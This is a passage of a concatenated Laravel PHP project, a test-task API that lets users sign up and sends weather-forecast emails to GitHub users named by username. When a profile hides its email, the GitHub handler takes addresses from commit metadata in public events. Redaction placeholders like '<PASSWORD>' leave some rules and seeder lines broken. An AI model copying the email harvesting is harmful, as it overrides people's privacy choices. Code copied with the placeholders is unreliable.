            ->assertJson([
                'title' => 'Validation Failed',
                'detail' => [
                    'email' => ['The email field is required.'],
                    'password' => ['<PASSWORD>.']
                ],
                'status' => 422,
            ])
        ;
    }
}
<file_sep>/app/Traits/CurlTrait.php
<?php
declare(strict_types=1);
namespace App\Traits;
/**
* Trait CurlTrait
* @package App\Traits
*/
trait CurlTrait
{
/**
 * Perform a GET request with the GitHub auth header attached.
 *
 * @param string $url absolute URL to fetch
 * @return mixed raw response body
 * @throws \RuntimeException when the transfer fails at the cURL level
 * @throws \Exception when no GitHub token is configured (see getHeaders())
 */
private function sendGetRequest($url)
{
    $curl = curl_init();
    $headers[] = $this->getHeaders();
    curl_setopt_array($curl, [
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_URL => $url,
        CURLOPT_HTTPHEADER => $headers,
        // GitHub's API rejects requests that carry no User-Agent header.
        CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
    ]);
    $response = curl_exec($curl);
    if ($response === false) {
        // FIX: the original silently returned false on transport errors, which
        // callers then fed straight into json_decode(); fail loudly instead.
        $error = curl_error($curl);
        curl_close($curl);
        throw new \RuntimeException(sprintf('Request to "%s" failed: %s', $url, $error));
    }
    curl_close($curl);
    return $response;
}
/**
 * Build the "Authorization: token ..." header for the GitHub API.
 *
 * @return string
 * @throws \Exception when app.github_token is missing from the config
 */
private function getHeaders(): string
{
    $githubToken = config('app.github_token');
    if(!$githubToken){
        throw new \Exception('GitHub token not found.');
    }
    return sprintf('Authorization: token %s', config('app.github_token'));
}
}<file_sep>/app/Http/Controllers/Api/MailController.php
<?php
declare(strict_types=1);
namespace App\Http\Controllers\Api;
use Mail;
use App\Mail\WeatherForecast;
use App\Handlers\GithubUsersHandler;
use App\Http\Controllers\Controller;
use App\Http\Requests\Api\GithubMailRequest;
use Symfony\Component\CssSelector\Exception\InternalErrorException;
use Symfony\Component\HttpKernel\Exception\BadRequestHttpException;
/**
* Class MailController
* @package App\Http\Controllers\Api
*/
class MailController extends Controller
{
    /**
     * Resolve the given GitHub usernames to email/location pairs and mail
     * each of them a weather forecast carrying the supplied message.
     *
     * @param GithubMailRequest $request
     * @return \Illuminate\Http\JsonResponse
     * @throws BadRequestHttpException
     * @throws InternalErrorException
     */
    public function byGithubUsernames(GithubMailRequest $request)
    {
        $usernames = $request->input('usernames');
        $message = $request->input('message');
        $handler = app()->make(GithubUsersHandler::class, ['usernames' => $usernames]);
        $this->sendWeatherEmails($handler->handle(), $message);
        return response()->json(['message' => 'All emails were sent successfully']);
    }

    /**
     * Send one WeatherForecast mail per resolved user.
     *
     * @param array $users entries shaped as ['email' => ..., 'location' => ...]
     * @param string $message body text forwarded into the mailable
     */
    private function sendWeatherEmails(array $users, string $message): void
    {
        foreach ($users as $user) {
            Mail::to($user['email'])->send(new WeatherForecast($user['location'], $message));
        }
    }
}
<file_sep>/routes/api.php
<?php
declare(strict_types=1);
use Swagger\Annotations as SWG;
/**
* @SWG\Swagger(
* schemes={"http"},
* host="doit-mailer.itls-ua.tk",
* basePath="/api/v1/",
* @SWG\SecurityScheme(
* securityDefinition="default",
* type="apiKey",
* name="Authorization",
* in="header",
* description="
For accessing the API a valid token must be passed
in the desired queries. The following syntax must
be used in the 'Authorization' header :
Bearer {{ token }}"
* ),
* @SWG\Info(
* version="1.0.0",
* title="DOIT Test Task Mailer API",
* description="REST API implementation based on the requirements described in technical specification",
* termsOfService="",
* @SWG\Contact(
* email="<EMAIL>"
* ),
* ),
* @SWG\Definition(
* definition="LoginRequest",
* required={"email", "<PASSWORD>"},
* @SWG\Property(property="email", type="string", format="email"),
* @SWG\Property(property="password", type="string", format="password"),
* ),
* @SWG\Definition(
* definition="GithubMailRequest",
* required={"usernames", "message"},
* @SWG\Property(
* property="usernames",
* type="array",
* @SWG\Items(type="string")
* ),
* @SWG\Property(property="message", type="string"),
* ),
* @SWG\Definition(
* definition="LoginResponse",
* @SWG\Property(property="token", type="string"),
* @SWG\Property(
* property="avatar",
* @SWG\Property(property="main", type="string"),
* @SWG\Property(property="thumbnail", type="string"),
* ),
* ),
* @SWG\Definition(
* definition="RegisterResponse",
* @SWG\Property(property="id", type="number"),
* @SWG\Property(property="email", type="string"),
* @SWG\Property(property="token", type="string"),
* @SWG\Property(
* property="avatar",
* @SWG\Property(property="main", type="string"),
* @SWG\Property(property="thumbnail", type="string"),
* ),
* ),
* @SWG\Definition(
* definition="Error",
* @SWG\Property(property="title", type="string", description="User friendly error"),
* @SWG\Property(property="detail", type="any", description="Error details"),
* @SWG\Property(property="status", type="number", description="HTTP status code"),
* ),
* )
*/
Route::group(['prefix' => 'v1', 'namespace' => 'Api'], function () {
    // All v1 endpoints; controllers resolve inside the Api namespace.
    // The @SWG docblocks below are parsed by swagger-php and must stay intact.
    /**
     * @SWG\Post(
     *     path="/login",
     *     operationId="apiLogin",
     *     tags={"Security"},
     *     summary="Sign in user in the system",
     *     description="Returns token and link to the avatar",
     *     @SWG\Parameter(
     *         name="Body",
     *         in="body",
     *         required=true,
     *         @SWG\Schema(ref="#/definitions/LoginRequest"),
     *     ),
     *     @SWG\Response(
     *         response=200,
     *         description="successful operation",
     *         examples={
     *             "application/json": {
     *                 "token": "<KEY>",
     *                 "avatar": {
     *                     "main": "APP_URL/storage/default.png",
     *                     "thumbnail": "APP_URL/storage/default-thumbnail.png"
     *                 },
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/LoginResponse"),
     *     ),
     *     @SWG\Response(
     *         response=404,
     *         description="Record Not Found",
     *         examples={
     *             "application/json": {
     *                 "title": "Record not found",
     *                 "detail": "The user with email: <EMAIL> doesn't exist!",
     *                 "status" : 404
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/Error"),
     *     ),
     *     @SWG\Response(
     *         response=405,
     *         description="Method Not Allowed",
     *         examples={
     *             "application/json": {
     *                 "title": "Method Not Allowed",
     *                 "detail": {"Allow": "POST"},
     *                 "status" : 405
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/Error"),
     *     ),
     *     @SWG\Response(
     *         response=422,
     *         description="Validation Error",
     *         examples={
     *             "application/json": {
     *                 "title": "Validation Failed",
     *                 "detail": {
     *                     "email": {
     *                         "The email must be a valid email address."
     *                     }
     *                 },
     *                 "status" : 422
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/Error"),
     *     ),
     * )
     */
    Route::post('login', 'SecurityController@login')->name('api_login');
    /**
     * @SWG\Post(
     *     path="/register",
     *     operationId="apiRegister",
     *     tags={"Security"},
     *     summary="Sign up user in the system",
     *     description="Returns all user data",
     *     @SWG\Parameter(
     *         name="email",
     *         in="formData",
     *         description="Email address",
     *         required=true,
     *         type="string",
     *         format="email"
     *     ),
     *     @SWG\Parameter(
     *         name="password",
     *         in="formData",
     *         description="Password",
     *         required=true,
     *         type="string",
     *         format="password"
     *     ),
     *     @SWG\Parameter(
     *         name="avatar",
     *         in="formData",
     *         description="Avatar image",
     *         required=false,
     *         type="file",
     *     ),
     *     @SWG\Response(
     *         response=201,
     *         description="Successful Operation",
     *         examples={
     *             "application/json": {
     *                 "id": 2,
     *                 "email": "<EMAIL>",
     *                 "token": "<KEY>",
     *                 "avatar": {
     *                     "main": "APP_URL/storage/default.png",
     *                     "thumbnail": "APP_URL/storage/default-thumbnail.png"
     *                 },
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/RegisterResponse"),
     *     ),
     *     @SWG\Response(
     *         response=405,
     *         description="Method Not Allowed",
     *         examples={
     *             "application/json": {
     *                 "title": "Method Not Allowed",
     *                 "detail": {"Allow": "POST"},
     *                 "status" : 405
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/Error"),
     *     ),
     *     @SWG\Response(
     *         response=422,
     *         description="Validation Error",
     *         examples={
     *             "application/json": {
     *                 "title": "Validation Failed",
     *                 "detail": {
     *                     "email": {
     *                         "The email must be a valid email address."
     *                     }
     *                 },
     *                 "status" : 422
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/Error"),
     *     ),
     *     @SWG\Response(
     *         response=500,
     *         description="Internal Server Error",
     *         examples={
     *             "application/json": {
     *                 "title": "Internal Server Error",
     *                 "detail": "The image cannot be decoded",
     *                 "status" : 500
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/Error"),
     *     ),
     * )
     */
    Route::post('register', 'SecurityController@register')->name('api_register');
    /**
     * @SWG\Post(
     *     path="/mail/github",
     *     operationId="mailGithub",
     *     tags={"Mail"},
     *     summary="Emails to GitHub Users",
     *     description="Sending emails to GitHub Users by their usernames",
     *     security={{"default": {}}},
     *     @SWG\Parameter(
     *         name="Body",
     *         in="body",
     *         required=true,
     *         @SWG\Schema(ref="#/definitions/GithubMailRequest"),
     *     ),
     *     @SWG\Response(
     *         response=200,
     *         description="successful operation",
     *         examples={
     *             "application/json": {
     *                 "message": "All emails were sent successfully"
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/LoginResponse"),
     *     ),
     *     @SWG\Response(
     *         response=401,
     *         description="Not Authorized",
     *         examples={
     *             "application/json": {
     *                 "title": "You are not authenticated in the system.",
     *                 "detail": "Check if token exists in 'Authorization' header",
     *                 "status" : 401
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/Error"),
     *     ),
     *     @SWG\Response(
     *         response=405,
     *         description="Method Not Allowed",
     *         examples={
     *             "application/json": {
     *                 "title": "Method Not Allowed",
     *                 "detail": {"Allow": "POST"},
     *                 "status" : 405
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/Error"),
     *     ),
     *     @SWG\Response(
     *         response=422,
     *         description="Validation Error",
     *         examples={
     *             "application/json": {
     *                 "title": "Validation Failed",
     *                 "detail": {
     *                     "usernames": {
     *                         "The usernames field is required."
     *                     }
     *                 },
     *                 "status" : 422
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/Error"),
     *     ),
     *     @SWG\Response(
     *         response=500,
     *         description="Internal Server Error",
     *         examples={
     *             "application/json": {
     *                 "title": "Internal Server Error",
     *                 "detail": "Open Weather Map not reachable",
     *                 "status" : 500
     *             }
     *         },
     *         @SWG\Schema(ref="#/definitions/Error"),
     *     ),
     * ),
     */
    // Endpoints below require a valid Bearer token (auth:api guard).
    Route::group(['middleware' => 'auth:api'], function () {
        Route::post('mail/github', 'MailController@byGithubUsernames');
    });
});
<file_sep>/app/Handlesrs/AvatarHandler.php
<?php
declare(strict_types=1);
namespace App\Handlers;
use File;
use Image;
use App\Models\User;
use App\Models\UserAvatar;
use Illuminate\Http\UploadedFile;
/**
* Class AvatarHandler
* @package App\Handlers
*/
class AvatarHandler
{
// Uploaded image and its owner; both are fixed at construction time.
private $file;
private $user;
/**
 * AvatarHandler constructor.
 * @param UploadedFile $file raw uploaded avatar image
 * @param User $user owner the avatar is stored for
 */
public function __construct(UploadedFile $file, User $user)
{
    $this->file = $file;
    $this->user = $user;
}
/**
 * Store the uploaded image as the user's avatar: generate file names, move
 * the upload, write a 512px main image plus a 150px thumbnail, then record
 * both rows in the database.
 */
public function handle()
{
    list($avatarName, $thumbnailName) = $this->createNamesForAvatars();
    list($ownerPath, $savePath) = $this->storeImageInSystem($avatarName);
    // FIX: File::makeDirectory() throws when the directory already exists
    // (e.g. a user uploading a second avatar); create it only when missing.
    if (!File::isDirectory($savePath)) {
        File::makeDirectory($savePath, 0755, true);
    }
    $this->saveAvatarImages($avatarName, $savePath, $thumbnailName);
    $this->createUserAvatars($avatarName, $ownerPath, $thumbnailName);
}
/**
 * Build unique file names for the avatar and its thumbnail.
 *
 * @return array [main file name, thumbnail file name]
 */
private function createNamesForAvatars(): array
{
    // Prefix with the current timestamp so repeated uploads of the same
    // original file name do not collide.
    $avatarName = sprintf('%d-%s', time(), $this->file->getClientOriginalName());
    return [$avatarName, 'thumbnail-' . $avatarName];
}
/**
 * Move the upload into storage/uploads and compute the user's storage paths.
 *
 * @param string $avatarName final file name of the avatar
 * @return array [relative owner path ("users/{id}/"), absolute save path]
 */
private function storeImageInSystem(string $avatarName): array
{
    // Temporary staging area; the resized copies are written under app/public.
    $this->file->move(storage_path('uploads'), $avatarName);
    $id = $this->user->id;
    $ownerPath = "users/$id/";
    $savePath = storage_path('app/public/' . $ownerPath);
    return [$ownerPath, $savePath];
}
/**
 * Write the 512px main avatar and the 150px thumbnail from the staged upload.
 *
 * @param string $avatarName file name of the main avatar
 * @param string $savePath absolute directory the images are written into
 * @param string $thumbnailName file name of the thumbnail
 */
private function saveAvatarImages(string $avatarName, string $savePath, string $thumbnailName): void
{
    // REFACTOR: the two identical resize/save pipelines are collapsed into
    // one helper that only varies in target width and destination.
    $source = storage_path('uploads/' . $avatarName);
    $this->resizeAndSave($source, $savePath . $avatarName, 512);
    $this->resizeAndSave($source, $savePath . $thumbnailName, 150);
}

/**
 * Resize an image to the given width (keeping aspect ratio, never upscaling)
 * and save it at full quality.
 *
 * @param string $source absolute path of the staged upload
 * @param string $destination absolute path to write the resized copy to
 * @param int $width target width in pixels
 */
private function resizeAndSave(string $source, string $destination, int $width): void
{
    Image::make($source)
        ->resize($width, null, function ($constraint) {
            $constraint->aspectRatio();
            $constraint->upsize();
        })
        ->save($destination, 100)
    ;
}
/**
 * Persist one TYPE_MAIN and one TYPE_THUMBNAIL row pointing at the files
 * written by saveAvatarImages().
 *
 * @param string $avatarName file name of the main avatar
 * @param string $ownerPath relative path ("users/{id}/") stored with each row
 * @param string $thumbnailName file name of the thumbnail
 */
private function createUserAvatars(string $avatarName, string $ownerPath, string $thumbnailName): void
{
    $this->user->avatars()->create([
        'name' => $avatarName,
        'type' => UserAvatar::TYPE_MAIN,
        'path' => $ownerPath
    ])
    ;
    $this->user->thumbnails()->create([
        'name' => $thumbnailName,
        'type' => UserAvatar::TYPE_THUMBNAIL,
        'path' => $ownerPath
    ])
    ;
}
}<file_sep>/readme.md
## Test task for DOIT Software
### Task
- [x] Provide a link to the Git repo. [GitHub link](https://github.com/VBetsun/doit-mailer)
- [x] Upload the code to any hosting and send an URL for testing.[Hosting link](http://doit-mailer.itls-ua.tk)
- [x] Create API doc.[Documentation link](http://doit-mailer.itls-ua.tk/api/documentation)
### Description
As a user I can:
- [x] Sign up.
- [x] Sign in.
- [x] Enter GitHub usernames and send them a message through email.
### Requirements
- [x] Security implementation based on tokens.
- [x] A response in the JSON format.
- [x] Save avatar + thumbnail during registration.
- [x] The same structure for all the responses.
### Installing
Clone the project:
```
git clone https://github.com/VBetsun/doit-mailer.git /path/to/project
```
Navigate to folder:
```
cd /path/to/project
```
Install packages:
```
composer install
```
Create a symbolic link from "public/storage" to "storage/app/public":
```
php artisan storage:link
```
Give the www-data user the correct permissions:
```
./permissions.sh
```
Run the migrations & seed the DB with fake data:
```
php artisan migrate --seed
```
Run tests
```
./vendor/bin/phpunit tests/Feature/
```
Run built-in server:
```
php artisan serve
```
Enjoy on [this url](http://127.0.0.1:8000) :)
<file_sep>/app/Traits/AuthSanitizerTrait.php
<?php
declare(strict_types=1);
namespace App\Traits;
/**
* Trait AuthSanitizerTrait
* @package App\Traits
*/
trait AuthSanitizerTrait
{
    use InputCleaner;

    /**
     * Clean the credential fields of the request in place before validation.
     */
    public function sanitize()
    {
        $input = $this->all();
        foreach (['email', 'password'] as $field) {
            if ($this->filled($field)) {
                $input[$field] = $this->clean($input[$field]);
            }
        }
        $this->replace($input);
    }
}
<file_sep>/app/Http/Resources/User.php
<?php
namespace App\Http\Resources;
use Illuminate\Http\Resources\Json\JsonResource;
class User extends JsonResource
{
    /**
     * Transform the resource into an array.
     *
     * The id/email pair is only exposed on the registration route; login
     * responses carry just the token and avatar links.
     *
     * @param \Illuminate\Http\Request $request
     * @return array
     */
    public function toArray($request)
    {
        return [
            $this->mergeWhen($request->route()->getName() === 'api_register', [
                'id' => $this->id,
                'email' => $this->email,
            ]),
            'token' => $this->api_token,
            'avatar' => [
                'main' => $this->getAvatar(),
                'thumbnail' => $this->getAvatarThumbnail()
            ],
        ];
    }
}
<file_sep>/app/Http/Requests/Api/LoginRequest.php
<?php
declare(strict_types=1);
namespace App\Http\Requests\Api;
use App\Traits\AuthSanitizerTrait;
use Illuminate\Foundation\Http\FormRequest;
/**
* Class LoginRequest
* @package App\Http\Requests\Api
*/
class LoginRequest extends FormRequest
{
    use AuthSanitizerTrait;
    /**
     * Determine if the user is authorized to make this request.
     *
     * Always true: authentication itself happens in the controller.
     *
     * @return bool
     */
    public function authorize()
    {
        return true;
    }
    /**
     * Get the validation rules that apply to the request.
     *
     * Input is sanitized (see AuthSanitizerTrait) before the rules run.
     * NOTE(review): the password rule string looks like a dataset redaction
     * ('<PASSWORD>') — restore the real rule from version control.
     *
     * @return array
     */
    public function rules()
    {
        $this->sanitize();
        return [
            'email' => 'required|string|email|max:255',
            'password' => '<PASSWORD>',
        ];
    }
}
<file_sep>/app/Http/Requests/Api/GithubMailRequest.php
<?php
declare(strict_types=1);
namespace App\Http\Requests\Api;
use App\Traits\InputCleaner;
use Illuminate\Foundation\Http\FormRequest;
/**
* Class GithubMailRequest
* @package App\Http\Requests\Api
*/
class GithubMailRequest extends FormRequest
{
    use InputCleaner;

    /**
     * Authorization is handled by the auth:api middleware; always allow here.
     *
     * @return bool
     */
    public function authorize()
    {
        return true;
    }

    /**
     * Validation rules; the input is sanitized first.
     *
     * @return array
     */
    public function rules()
    {
        $this->sanitize();
        return [
            'usernames' => 'required',
            'usernames.*' => 'required|string|min:3',
            'message' => 'required|string',
        ];
    }

    /**
     * Custom validation messages.
     *
     * @return array
     */
    public function messages()
    {
        return [
            'usernames.*.required' => 'No one username in the list can\'t be empty',
        ];
    }

    /**
     * Normalize "usernames" to an array of cleaned strings and clean "message".
     */
    public function sanitize()
    {
        $input = $this->all();
        if ($this->filled('usernames')) {
            // A single scalar username is wrapped so the field is always an array.
            $raw = is_array($input['usernames']) ? $input['usernames'] : [$input['usernames']];
            $cleaned = [];
            foreach ($raw as $username) {
                $cleaned[] = $this->clean($username);
            }
            $input['usernames'] = $cleaned;
        }
        if ($this->filled('message')) {
            $input['message'] = $this->clean($input['message']);
        }
        $this->replace($input);
    }
}
<file_sep>/database/seeds/UsersTableSeeder.php
<?php
use App\Models\User;
use Illuminate\Database\Seeder;
class UsersTableSeeder extends Seeder
{
    /**
     * Run the database seeds.
     *
     * @return void
     */
    public function run()
    {
        $this->createAdmin();
        // factory(User::class, 12)->create()->each(function ($user) {
        // $user->role()->save(factory(App\Models\Role::class)->make());
        // });
    }
    // Create the single admin account used by the feature tests.
    // NOTE(review): the email and the make() argument are dataset redactions
    // ('<EMAIL>', '<PASSWORD>'); restore the real literals from version control.
    private function createAdmin()
    {
        $hasher = app()->make('hash');
        User::create([
            'email' => '<EMAIL>',
            'password' => $hasher->make(<PASSWORD>)
        ]);
    }
}
<file_sep>/database/seeds/DatabaseSeeder.php
<?php
use Illuminate\Database\Seeder;
class DatabaseSeeder extends Seeder
{
    // Tables truncated before re-seeding.
    private $tables = [
        'users',
        'user_avatars'
    ];
    /**
     * Seed the application's database.
     *
     * @return void
     */
    public function run()
    {
        $this->cleanDatabase();
        $this->call(UsersTableSeeder::class);
    }
    /**
     * Truncate all seeded tables with foreign-key checks temporarily disabled
     * (truncate() would otherwise fail on constrained tables).
     */
    private function cleanDatabase()
    {
        $this->setForeignKeyChecks(false);
        foreach ($this->tables as $tableName) {
            DB::table($tableName)->truncate();
        }
        $this->setForeignKeyChecks(true);
    }
    /**
     * Toggle foreign-key enforcement for the current connection.
     * REFACTOR: replaces the two duplicated mysql/sqlite if/elseif blocks.
     *
     * @param bool $enabled
     * @throws \Exception for drivers other than mysql/sqlite
     */
    private function setForeignKeyChecks(bool $enabled)
    {
        $connection = DB::connection()->getPDO()->getAttribute(PDO::ATTR_DRIVER_NAME);
        if ($connection === 'mysql') {
            DB::statement('SET FOREIGN_KEY_CHECKS = ' . ($enabled ? '1' : '0'));
        } elseif ($connection === 'sqlite') {
            DB::statement('PRAGMA foreign_keys = ' . ($enabled ? 'ON' : 'OFF'));
        } else {
            throw new \Exception('Driver not supported.');
        }
    }
}
<file_sep>/tests/Feature/GithubMailTest.php
<?php
declare(strict_types=1);
namespace Tests\Feature\Common;
use App\Models\User;
use Tests\TestCase;
/**
* Class GithubMailTest
* @package Tests\Feature\Common
*/
class GithubMailTest extends TestCase
{
    // Endpoint under test and the seeded user whose token authenticates requests.
    private $url;
    private $user;
    public function setUp()
    {
        parent::setUp();
        $this->url = '/api/v1/mail/github';
        // User id 1 is the admin created by UsersTableSeeder.
        $this->user = (new User)->find(1);
    }
    // Top-level key a successful dispatch response must contain.
    private const CORRECT_RESPONSE_STRUCTURE = [
        'message',
    ];
    // Happy path: a valid token plus an existing GitHub username returns 200.
    // NOTE(review): this hits the live GitHub/OWM integrations — confirm they
    // are stubbed, otherwise the test is network-dependent.
    public function testSendEmailsByUsernames()
    {
        $headers = ['Authorization' => "Bearer {$this->user->api_token}"];
        $body = [
            'usernames' => ['vbetsun'],
            'message' => 'Neque porro quisquam est qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit..'
        ];
        $response = $this->json('POST', $this->url, $body, $headers);
        $response->assertStatus(200)
            ->assertJsonStructure(static::CORRECT_RESPONSE_STRUCTURE)
        ;
    }
    // Requests without a Bearer token must be rejected with 401.
    public function testRestrictSendEmailsWithoutAuth()
    {
        $response = $this->json('POST', $this->url);
        $response->assertStatus(401)
            ->assertJson([
                'title' => 'You are not authenticated in the system.',
                'detail' => 'Check if token exists in "Authorization" header',
                'status' => 401,
            ]);
    }
    // Empty payload: both "required" rules must fire with a 422.
    public function testRestrictSendEmailsWithEmptyData()
    {
        $headers = ['Authorization' => "Bearer {$this->user->api_token}"];
        $body = [
            'usernames' => $this->getEmptyField(),
            'message' => $this->getEmptyField()
        ];
        $response = $this->json('POST', $this->url, $body, $headers);
        $response->assertStatus(422)
            ->assertJson([
                'title' => 'Validation Failed',
                'detail' => [
                    'usernames' => ['The usernames field is required.'],
                    'message' => ['The message field is required.']
                ],
                'status' => 422,
            ])
        ;
    }
}
<file_sep>/app/Handlesrs/GithubUsersHandler.php
<?php
declare(strict_types=1);
namespace App\Handlers;
use App\Traits\CurlTrait;
use Symfony\Component\HttpKernel\Exception\BadRequestHttpException;
/**
* Class GithubUsersHandler
* @package App\Handlers
*/
class GithubUsersHandler
{
use CurlTrait;
// Usernames to resolve, the accumulated results, and the two failure lists
// consulted by checkDispatchAbility().
private $usernames;
private $validUsers = [];
private $usersWithoutEmail = [];
private $usersWithoutLocation = [];
/**
 * GithubUsersHandler constructor.
 * @param $usernames array of GitHub usernames to resolve
 */
public function __construct(array $usernames)
{
    $this->usernames = $usernames;
}
/**
 * Resolve every configured username against the GitHub API.
 *
 * @return array entries shaped as ['email' => ..., 'location' => ...]
 * @throws BadRequestHttpException when a username does not exist on GitHub
 * @throws \Exception when any user lacks a public email or location
 */
public function handle()
{
    foreach ($this->usernames as $username) {
        list($basicDecodedData, $publicEventsDecodedData) = $this->prepareUserData($username);
        if ($this->isGithubUserNotExists($basicDecodedData)) {
            throw new BadRequestHttpException(sprintf(
                'User with username "%s" doesn\'t exist on GitHub',
                $username
            ));
        }
        $email = $this->getEmailFromDecodedData($basicDecodedData, $publicEventsDecodedData);
        if (!$email) {
            // FIX: the original appended to a LOCAL $usersWithoutEmail variable
            // while checkDispatchAbility() read the (always empty) property,
            // so the missing-email guard never fired.
            $this->usersWithoutEmail[] = $username;
        }
        if ($this->isGithubUserWithoutLocation($basicDecodedData)) {
            // FIX: same local-vs-property mix-up as above.
            $this->usersWithoutLocation[] = $username;
        }
        $this->validUsers[] = [
            'email' => $email,
            'location' => $basicDecodedData->location
        ];
    }
    $this->checkDispatchAbility($this->usersWithoutEmail, $this->usersWithoutLocation);
    return $this->validUsers;
}
/**
 * Fetch and decode a user's profile plus their public event stream.
 *
 * @param $username GitHub username
 * @return array [decoded /users/{name} payload, decoded public-events payload]
 */
private function prepareUserData($username): array
{
    $basicUrl = sprintf('https://api.github.com/users/%s', $username);
    $basicData = $this->sendGetRequest($basicUrl);
    $publicEventsData = $this->sendGetRequest($basicUrl . '/events/public');
    // NOTE(review): json_decode returns null on malformed payloads; callers
    // assume objects/arrays here — confirm error handling upstream.
    $basicDecodedData = json_decode($basicData);
    $publicEventsDecodedData = json_decode($publicEventsData);
    return [$basicDecodedData, $publicEventsDecodedData];
}
/**
 * True when the GitHub API answered with its "Not Found" error payload.
 *
 * @param object $basicDecodedData decoded /users/{name} response
 * @return bool
 */
private function isGithubUserNotExists($basicDecodedData): bool
{
    if (!property_exists($basicDecodedData, 'message')) {
        return false;
    }
    return $basicDecodedData->message === 'Not Found';
}
/**
 * Find a usable email address for a GitHub user: prefer the public profile
 * email, otherwise fall back to the first commit-author email found in the
 * user's public events.
 *
 * @param $basicData decoded /users/{name} payload
 * @param $publicEventsData decoded public-events payload
 * @return string|null null when no email could be discovered
 */
private function getEmailFromDecodedData($basicData, $publicEventsData)
{
    if ($basicData->email !== null) {
        return $basicData->email;
    }
    // Scan push events for commits and take the first author email seen.
    foreach ($publicEventsData as $data) {
        if (property_exists($data->payload, 'commits')) {
            foreach ($data->payload->commits as $commit) {
                if ($commit->author->email !== null) {
                    return $commit->author->email;
                }
            }
        }
    }
    return null;
}
/**
 * True when the user's public profile has no location set.
 *
 * @param object $basicDecodedData decoded /users/{name} response
 * @return bool
 */
private function isGithubUserWithoutLocation($basicDecodedData): bool
{
    return $basicDecodedData->location === null;
}
/**
 * Abort dispatch if any resolved user lacks an email or a location.
 *
 * @param array $usersWithoutEmail usernames with no discoverable email
 * @param array $usersWithoutLocation usernames with no profile location
 * @throws \Exception listing the offending usernames
 */
private function checkDispatchAbility($usersWithoutEmail, $usersWithoutLocation): void
{
    if ($usersWithoutEmail !== []) {
        throw new \Exception(sprintf(
            'Emails can\'t be sent because the user(s): "%s" didn\'t specify email field',
            implode(', ', $usersWithoutEmail)
        ));
    }
    if ($usersWithoutLocation !== []) {
        // FIX: the original imploded $usersWithoutEmail here, so the message
        // named the wrong (possibly empty) list of users.
        throw new \Exception(sprintf(
            'Emails can\'t be sent because the user(s): "%s" didn\'t specify location field',
            implode(', ', $usersWithoutLocation)
        ));
    }
}
}<file_sep>/tests/TestCase.php
<?php
namespace Tests;
use App\Models\User;
use Illuminate\Foundation\Testing\DatabaseMigrations;
use Illuminate\Foundation\Testing\TestCase as BaseTestCase;
/**
 * Base test case: boots the application, migrates and seeds the database
 * before every test, and exposes helpers for building field values.
 */
abstract class TestCase extends BaseTestCase
{
    use CreatesApplication, DatabaseMigrations;

    /**
     * Seed the freshly migrated database before each test runs.
     */
    public function setUp()
    {
        parent::setUp();
        \Artisan::call('db:seed');
    }

    /**
     * An overly long string, useful for max-length validation tests.
     *
     * @param int $length
     * @return string
     */
    protected function getLongField($length = 170)
    {
        return str_repeat('a', $length);
    }

    /**
     * An empty value for required-field validation tests.
     *
     * @return string
     */
    protected function getEmptyField()
    {
        return '';
    }

    /**
     * A value that fails format validation (e.g. not an email address).
     *
     * @return string
     */
    protected function getInvalidField()
    {
        return 'asdasdasd';
    }
}
<file_sep>/app/Mail/WeatherForecast.php
<?php
declare(strict_types=1);
namespace App\Mail;
use Illuminate\Bus\Queueable;
use Illuminate\Mail\Mailable;
use Illuminate\Queue\SerializesModels;
use Gmopx\LaravelOWM\LaravelOWM;
/**
 * Class WeatherForecast
 *
 * Mailable that renders the weather-forecast email for a user's location.
 *
 * NOTE(review): Laravel injects its own $message variable into mail views;
 * a public $message property on a Mailable can collide with it — confirm
 * the template does not rely on Laravel's injected $message.
 *
 * @package App\Mail
 */
class WeatherForecast extends Mailable
{
    use Queueable, SerializesModels;

    // Raw location string supplied by the caller.
    public $location;

    // Message text made available to the view.
    public $message;

    /**
     * Create a new message instance.
     *
     * @param string $location
     * @param string $message
     */
    public function __construct(string $location, string $message)
    {
        $this->location = $location;
        $this->message = $message;
    }

    /**
     * Build the markdown email, choosing an image for the current weather.
     *
     * @return $this
     */
    public function build()
    {
        $current = $this->getWeather();

        return $this->markdown('emails.weather-forecast', [
            'weatherImage' => $this->getWeatherImage($current->description),
        ]);
    }

    /**
     * Query OpenWeatherMap for the current weather at the user's location.
     *
     * @return \Cmfcmf\OpenWeatherMap\Util\Weather
     */
    private function getWeather()
    {
        $owm = new LaravelOWM();

        return $owm->getCurrentWeather($this->getCurrentLocation())->weather;
    }

    /**
     * Last whitespace-separated token of the stored location string.
     *
     * @return array|mixed
     */
    private function getCurrentLocation()
    {
        $parts = explode(' ', $this->location);

        return array_pop($parts);
    }

    /**
     * Map an OpenWeatherMap description to an email image name.
     *
     * Unrecognized descriptions fall back to 'mist'.
     *
     * @param string $weather
     * @return string
     */
    private function getWeatherImage(string $weather): string
    {
        $images = [
            'clear sky'        => 'sun',
            'few clouds'       => 'cloudy_sun',
            'scattered clouds' => 'cloud',
            'broken clouds'    => 'cloud',
            'shower rain'      => 'rain_cloud',
            'rain'             => 'rain_cloud',
            'thunderstorm'     => 'thunder_cloud',
            'snow'             => 'snow_cloud',
        ];

        return $images[$weather] ?? 'mist';
    }
}
<file_sep>/app/Models/UserAvatar.php
<?php
declare(strict_types=1);
namespace App\Models;
use Illuminate\Database\Eloquent\Model;
use Illuminate\Database\Eloquent\Relations\BelongsTo;
/**
 * Class UserAvatar
 * @package App\Models
 * @property int $id
 * @property int $user_id
 * @property string $name
 * @property string $path
 * @property \Carbon\Carbon|null $deleted_at
 * @property \Carbon\Carbon|null $updated_at
 * @property \Carbon\Carbon|null $created_at
 * @property-read \App\Models\User $user
 * @mixin \Eloquent
 */
class UserAvatar extends Model
{
    // Avatar variants stored per user.
